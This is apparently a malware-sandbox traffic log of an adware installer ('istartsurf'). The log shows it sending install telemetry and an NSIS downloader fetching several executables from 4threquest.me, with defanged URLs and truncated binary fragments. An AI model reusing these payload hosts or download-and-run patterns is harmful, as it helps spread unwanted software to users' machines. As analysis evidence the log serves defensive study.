Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.gosaferllc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:22 GMT
Content-Type: text/plain
Connection: keep-alive
Last-Modified: Sun, 28 Dec 2014 17:27:37 GMT
ETag: "5a246f5-10-50b4a12f3b440"
Accept-Ranges: bytes
Content-Length: 16
Cache-Control: max-age=600
Expires: Thu, 30 Apr 2015 23:17:22 GMT
P3P: CP="Potato"
X-Cache: BYPASS
</body>|</body>.....
GET /services/update.php?v=1.0.0&key=OuKz1Yi6BxlXdCQ8IZpYGGBgz2TyMvRv&dummy=408 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.gosaferllc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:23 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.5.15
P3P: CP="Potato"
Content-Length: 0
X-Cache: BYPASS
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.hp HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:18 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.85 ms","message":"store 1 action and 0 update "}..0..
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.nt.ff.tab HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:25 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
4a..{"stats":"ok","time":"289.61 ms","message":"store 1 action and 0 update "}..0..
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECEGVSJuGyLhjhWQ8phawi51w= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1453
content-transfer-encoding: binary
Cache-Control: max-age=552950, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 08:45:10 GMT
Expires: Thu, 7 May 2015 08:45:10 GMT
Date: Thu, 30 Apr 2015 23:12:10 GMT
Connection: keep-alive
0..........0..... .....0......0...0......T3t.%..O.E..~..F.=....20150430084510Z0s0q0I0... ........H.dI.....3..^B...d6Q....ZL%."..1.m..._)..a..eR&.....Y.)..".\....20150430084510Z....20150507084510Z0...*.H.............S.F1....m^.f...(.Ss@*M`:_.GI.Y.I"..}M@........*....o9-.{2W..)'./.A....VIl....Xy......#.J..!..z.Q...0.Z.W.e....{D...tm..=.(........W.3G.t..mw....#tn%n.P...,...E.mD.N..P.b.qY..|.c.>..xBZ.J.l.G..wx.......y.89...@.i.~.?.o.x.k.KB......6.....g.owYk........B(...D....0...0...0..3......./...b.v..-....l}0...*.H........0_1.0...U....US1.0...U....VeriSign, Inc.1705..U....Class 3 Public Primary Certification Authority0...141202000000Z..151216235959Z0..1.0...U....US1.0...U....Symantec Corporation1.0...U....Symantec Trust Network1?0=..U...6Symantec Class 3 PCA - G1 OCSP Responder Certificate 30.."0...*.H.............0..........'......Y..x.3B1.7..Q..`..d.. ....s..t.$a.....j2R.{ ,*..c{.3.....H..3-; ).....0._...*..9M..V...... ...{m...-.......)..tR..{D....~...M...T..pS.p..^|o....S..v.).).....r.v.qo$......C.V!....@.h#qh...u1T.].G0.]E...=._...... ........TE...Sa.s4........r...3.............0..0...U....0.0l..U. .e0c0a..`.H...E....0R0&.. .........hXXp://VVV.symauth.com/cps0(.. .......0...hXXp://VVV.symauth.com/rpa0...U.%..0... .......0...U........0... .....0......0!..U....0...0.1.0...U....TGV-B-2730...*.H.............$..H......oU....Y!.z{*.V.M..u.._z..3>.. 0....3..m.....e.......a..D...........e..F6:.y.....di.......<y.Z.......x}..q.2....UZ1 :,....
<<< skipped >>>
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAxNF3PJUX7iAOhAP2oGxcI= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1790
content-transfer-encoding: binary
Cache-Control: max-age=361763, public, no-transform, must-revalidate
Last-Modified: Tue, 28 Apr 2015 03:40:02 GMT
Expires: Tue, 5 May 2015 03:40:02 GMT
Date: Thu, 30 Apr 2015 23:12:11 GMT
Connection: keep-alive
0..........0..... .....0......0...0......'.V.8.F.V....H....JW..20150428034002Z0s0q0I0... ..........!7h....O.d...AG&h.....k.&p..?...-.5........M.s.Q~...@?j.......20150428034002Z....20150505034002Z0...*.H..............>...|.#%....9.x.Fl.{.j..i.{<...B......5h..T.....<....).nU,7.L.,UpM&F9~.....ye.wpA.W.(9...VO{R.".~.C..G.t.*B...L......D.tj.............@.F......O$...zL........{..G...............].A..z..:{.*&*..2QS..s..Nt3..G..CR..D...-.T....H...l.7\..z..:.E.}L.Yk.Zvc..[.....#0...0...0..........r..?.*......y"..0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://VVV.verisign.com/rpa (c)09100...U...'VeriSign Class 3 Code Signing 2009-2 CA0...150226000000Z..150527235959Z0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://VVV.verisign.com/rpa (c)091<0:..U...3VeriSign Class 3 Code Signing 2009-2 OCSP Responder0.."0...*.H.............0.............m5*R........2....>...yU4..L.. ...........u..Hez..Pn.....d...nz(...V7.}^...d!RX...bl..[..a...L.. .~..Ij......%..%p.-...u..:..i..F*]...*....{NH..|0...gHX.Q.r....S..........._.9.(w...suC...N..s.....&."...:.C.Q.i~rl..<..krS..8.B..o].y..L.4...iB@..s.....mw.........0...0...U....0.0....U. ...0..0....`.H...E....0..0(.. .........hXXps://VVV.verisign.com/CPS0b.. .......0V0...VeriSign, Inc.0.....=VeriSign's CPS incorp. by reference liab. ltd. (c)97 VeriSign0...U.%..0... .......0...U........0... .....0......0"..U....0...0.1.0...U....TGV-B-32010...
<<< skipped >>>
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.ChromeSync HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:39 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"1.20 ms","message":"store 1 action and 0 update "}..0..
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.regok HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:21 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.63 ms","message":"store 1 action and 0 update "}..0..
GET //MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH+3ahq1OMCAxvnFQ== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:52 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=120329, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 22:22:55 GMT
Expires: Sat, 02 May 2015 10:22:55 GMT
ETag: "c6961d1bde2c92575adba40476a0f961c1ef5e15"
Content-Length: 1708
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0......0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.100...U...'Go Daddy Root Validation Authority - G1..20150430222255Z0f0d0<0... ......... ......]..J^.y_..F<........L.q.a.=....j...........20150430222255Z....20150502102255Z0...*.H..............z...ue.`iK..sr.Q.2.....)q7....c........(.".....eZ..<..9$....]..Ws. 6.N@.......M.Us.;...h..58.z.........g.......y.......#. ....U.v........;.".U`....O...l3.$$..-L\.i9.#{tlf{.[J.R..RO.u....Te.\L.....?U..vM.q..%..5..b...[..h-.F.c...v.iz.....BS.h`.td.....W..Z....m0..i0..e0..M...........T.m^'0...*.H........0c1.0...U....US1!0...U....The Go Daddy Group, Inc.110/..U...(Go Daddy Class 2 Certification Authority0...150316070000Z..160316070000Z0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.100...U...'Go Daddy Root Validation Authority - G10.."0...*.H.............0.........xo(....QQ.`L.~...&...a.F.=.....d=....."......?...\..........b.D....l=.HS.N......A..;....C)...(..T........XA-N....k1 .....ag...,4.L{.I..hEKb..K.....
<<< skipped >>>
GET /310714d/310714_cr.exe?g3CvT78vSMa0N0LPai7Qvt=g3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:42 GMT
Content-Type: application/octet-stream
Content-Length: 1085040
Last-Modified: Thu, 30 Apr 2015 23:07:02 GMT
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s.......................................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc................v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
GET /310714d/291014_nj.exe?g3CvT78vSMa0N0LPai7Qvt=g3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:47 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 1985320
Content-Description: File Transfer
Content-Disposition: attachment; filename="291014_nj.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s..........h............................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc...h............v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
GET /310714d/310714_gs.exe?g3CvT78vSMa0N0LPai7Qvt=g3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:47 GMT
Content-Type: application/octet-stream
Content-Length: 1112422
Last-Modified: Thu, 30 Apr 2015 23:07:02 GMT
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s..........H............................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc...H............v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
GET /010914s/verificar_ip.php HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
Content-Encoding: gzip
18............s.......X.......0..
GET /img/Global/Yes_Button.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 1091
Connection: keep-alive
x-amz-id-2: FufJylo2h0LlgAvBhv6FKeS8RiEbjEd6iaXEFUTvT/OyG ZgeEaS5ooHNe8/F0Le
x-amz-request-id: 69875246E7628FFF
x-amz-meta-s3fox-filesize: 1091
x-amz-meta-s3fox-modifiedtime: 1380713503006
Last-Modified: Wed, 13 Nov 2013 16:12:48 GMT
x-amz-version-id: .ffwqW.8iCK2_zdeBNvgWdy.OnUDjeHF
ETag: "3f27a393967d84f83a317f40351c0065"
Accept-Ranges: bytes
.PNG........IHDR...T.........d.......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:2D2B0E0924EA11E392EFCCF1BDECC388" xmpMM:DocumentID="xmp.did:2D2B0E0A24EA11E392EFCCF1BDECC388"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2D2B0E0724EA11E392EFCCF1BDECC388" stRef:documentID="xmp.did:2D2B0E0824EA11E392EFCCF1BDECC388"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..&X....IDATx...1..0.E.......... .d.6\.&.NDH.v....9.{....)...D$k...O...T.[Sl.I....K.....S3..fB...2?w.....2...../=#.3.E(B...E(B...E( ...E(..Z..f..)U..l9.....7...........I..w...).u*..P#G...?...%....\.l....IEND.B`.....
<<< skipped >>>
GET /img/Global/Yes_Button_Hover.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 1094
Connection: keep-alive
x-amz-id-2: ZH/H/BrlB90f12Jgses7dcqPxryj5NnMS0cI2SxwLBB85Qfj2OXlGAsGTEDmcFC7
x-amz-request-id: 91A6ABE35D0A7569
x-amz-meta-s3fox-filesize: 1094
x-amz-meta-s3fox-modifiedtime: 1380713503000
Last-Modified: Wed, 13 Nov 2013 16:12:44 GMT
x-amz-version-id: L9RQqPthtuNtMC55hxM9o_RZqWXqZtid
ETag: "aec475b9d6280598800f3ceafea4af8c"
Accept-Ranges: bytes
.PNG........IHDR...T.........d.......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:30B2AE2724EA11E392EFCCF1BDECC388" xmpMM:DocumentID="xmp.did:30B2AE2824EA11E392EFCCF1BDECC388"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:30B2AE2524EA11E392EFCCF1BDECC388" stRef:documentID="xmp.did:30B2AE2624EA11E392EFCCF1BDECC388"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>. ,.....IDATx......0.E..D....@L.^L...!...2...........=.....vq?.H.l4[.v..d.S.l......x..W{=..k...L(..3.....k.s..3...K....B..P..B..P@(B...E(B..u.f4.3..)e..l9z.i.?o..7.7M.....%...y..$.:.tA..K........S..^/......IEND.B`.....
<<< skipped >>>
GET /img/Global/No_Button_Hover.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 1091
Connection: keep-alive
x-amz-id-2: w8MZLmVYoBIXBjhf7AX2 gI11HEATjoL7xzl5WiqPif2jl7PuO2tfCE3vWAz3tzG
x-amz-request-id: E9FC3602133605A0
x-amz-meta-s3fox-filesize: 1091
x-amz-meta-s3fox-modifiedtime: 1380713503004
Last-Modified: Wed, 13 Nov 2013 16:12:47 GMT
x-amz-version-id: wNmfJwpUmazhRatL.BZxBG0x.XZldhEV
ETag: "6d55a62314755c1454569b2b098a3a9f"
Accept-Ranges: bytes
.PNG........IHDR...T.........d.......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:30B2AE2324EA11E392EFCCF1BDECC388" xmpMM:DocumentID="xmp.did:30B2AE2424EA11E392EFCCF1BDECC388"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:30B2AE2124EA11E392EFCCF1BDECC388" stRef:documentID="xmp.did:30B2AE2224EA11E392EFCCF1BDECC388"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx...1..0.E........8A9?=..h'.NDH.v..b $.{....)...D$j...O;.v...I6....../.s.....f....2.>.......1..?........ ...E( ....."...P."..PWhFC1...R.N...g......~.9h..~*.\.Q..3l'.....B.\.W...`.............IEND.B`.....
<<< skipped >>>
GET /img/Rerarapepe/logo.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 10944
Connection: keep-alive
x-amz-id-2: fttMRbWgO3QO0vLVbufMGrfOzBMWbPdneAkQOk8G/aPTYMrgBtiQS33MCTm hCu0
x-amz-request-id: 1D23872D552BD286
x-amz-meta-s3fox-filesize: 10944
x-amz-meta-s3fox-modifiedtime: 1384099835051
Last-Modified: Tue, 12 Nov 2013 11:05:48 GMT
x-amz-version-id: bDPFTNRsfueKXbAbmeVgRbPvzBoRvTw2
ETag: "0440e25b659207aaea00512d9a0a9924"
Accept-Ranges: bytes
.PNG........IHDR...L...^...........*.IDATx....T.....M...F."b.....F.Q....{.%..{E.........{.H....J.~*.....gN..j....._.Z..g..ff.....9C."..t:]'.F3-55uOjZz.......o....\...'....&J4[O*.=i.`%Y...................E.".....Z.>.69%;6.....HNIEFf&.J.,..r~..}.p).....e..V...3./)....A\|.............. k,Q...M..B..h....../..N........#..!V.P.y'X4J...v...Z...o.{ ''....L9....M.....7...l....Ml..SS..........$..C!.3.\...........A.'.......m_..%x...."@....)V%.?|WX...Y\.C.c.r.V..R....g...:.\2....4..M.R9X..b...b......,.U..t.b...Z...P..Q*......7.......t.B.{....@jY!.....Q......Tdk...3;...s..0... ....@.&..m.ktE.f. I.M..1...`..V..d[.9..qG.&".U..C..u...W.C{..4'..v?.....\..>......h<.C{.(4...u...G..E=Gvj..7[.?.:.?.K.9...e..s........,--=....[W'...v......R....^<...!..]........>..j........].v.....j.v..l.j.V.wn.j.&(I.][.r...Q.x..>....Hay...99f..;.%..R..Q_...h4Sy...a]....J.dQ..o........... 9...8.2Br..)...a)w..]...h.f.K.}#i.T[.......u..(.;.....d=....,..{....Z..._.Q..t:... ..H.R..Wt.f^...'6.Xu.\.DU*...u.oAK....&KQ.# .%.Q..f......{34.-.>.M............6'(.8@.y..Z.......$.UP:...i.../..5....V:..\...@.m'@B.:..f.\..,......17.......&.Qn..t..DJ.~w..z.j..........e.Q......&..tX...s.5s*..OA...HY......c...d@. .\.B..n9i..k.@.j.m[)...!h..P..r..,A...A..b......O.Oyr.i..".*....m.EA8...r....T.6H.DP.....n.y=4.LG..1m2N.n.G.rX..........?.....5%mp.A=...H@.C.a5.k.J.V/....J.r!..W.t..r.#Y..J.g.c...{.H,N...>r..lY.'.4.....m.....D.t..YT.d. hN..P.K`.....%\..a-..~....l..s....?...5....8..P... ......5.............3u"...#s..(....7@R,.....Es.9..(...m#k.8...tiP..
<<< skipped >>>
GET /img/Rerarapepe/Rerarapepe3.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/jpeg
Content-Length: 15799
Connection: keep-alive
x-amz-id-2: v/KJyRQPRqGzp68fMREpMsXVlN8ZGENjPJZ3xLLc6RX9mf6LfR53urxF4AogH8OE
x-amz-request-id: 10317CBB850CD0F8
x-amz-meta-s3fox-filesize: 15799
x-amz-meta-s3fox-modifiedtime: 1394538949746
Last-Modified: Tue, 11 Mar 2014 11:56:45 GMT
x-amz-version-id: zPl9IpmeaG3ff3qZpgvUQzMtoydG8QKH
ETag: "3e2809731062d36b6ae81e70aef3b785"
Accept-Ranges: bytes
......Exif..II*.................Ducky.......<.....ohXXp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:F7DDEC055CA8E311B43CF856625B69D6" xmpMM:DocumentID="xmp.did:08AEC486A91411E3A978EB316F7617DC" xmpMM:InstanceID="xmp.iid:08AEC485A91411E3A978EB316F7617DC" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:B1126B7673A8E311B43CF856625B69D6" stRef:documentID="xmp.did:F7DDEC055CA8E311B43CF856625B69D6"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...................................................................................................................................................0........................................................................................!..1A..Qaq"..2R.......r.#S.T.B.$4..3s...bCdt%U....c......................!1..AQ...aq..."2R......b3..B.r................?..J. ..U.@@@@@@@A...."... .a..... ..U.@@@A.A.]A....Dq.....p:QS...C.u.....|OZ...D<GZ...@..h.#.....E_....:......:.<GZ...A..Z*...C.u.x.......:.e..27...EwQ..z........
<<< skipped >>>
GET /img/Rerarapepe/Rerarapepe_b.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
